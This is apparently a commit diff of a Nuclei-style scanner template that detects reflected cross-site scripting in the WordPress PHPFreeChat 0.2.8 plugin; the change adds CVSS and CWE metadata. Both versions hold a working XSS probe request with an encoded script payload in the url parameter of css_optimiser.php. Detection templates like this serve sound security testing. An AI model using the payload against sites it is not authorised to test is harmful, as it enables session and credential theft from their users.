vulnerabilities/wordpress/wp-phpfreechat-xss.yaml (before)
id: wp-phpfreechat-xss

info:
  name: WordPress PHPFreeChat 0.2.8 - Cross-Site Scripting
  author: daffainfo
  severity: high
  description: WordPress PHPFreeChat 0.2.8 plugin contains a cross-site scripting vulnerability via the url parameter. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - http://web.archive.org/web/20210120061848/https://www.securityfocus.com/bid/54332/info
    - https://www.exploit-db.com/exploits/37485
  tags: wordpress,xss,wp-plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "</script><script>alert(document.domain)</script>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by md on 2022/09/23

vulnerabilities/wordpress/wp-phpfreechat-xss.yaml (after)
id: wp-phpfreechat-xss

info:
  name: WordPress PHPFreeChat 0.2.8 - Cross-Site Scripting
  author: daffainfo
  severity: high
  description: WordPress PHPFreeChat 0.2.8 plugin contains a cross-site scripting vulnerability via the url parameter. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - http://web.archive.org/web/20210120061848/https://www.securityfocus.com/bid/54332/info
    - https://www.exploit-db.com/exploits/37485
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: wordpress,xss,wp-plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "</script><script>alert(document.domain)</script>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by md on 2022/09/23

vulnerabilities/wordpress/wp-phpfreechat-xss.yaml (diff)
@@ -8,6 +8,10 @@ info:
   reference:
     - http://web.archive.org/web/20210120061848/https://www.securityfocus.com/bid/54332/info
     - https://www.exploit-db.com/exploits/37485
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
   tags: wordpress,xss,wp-plugin
 
 requests:
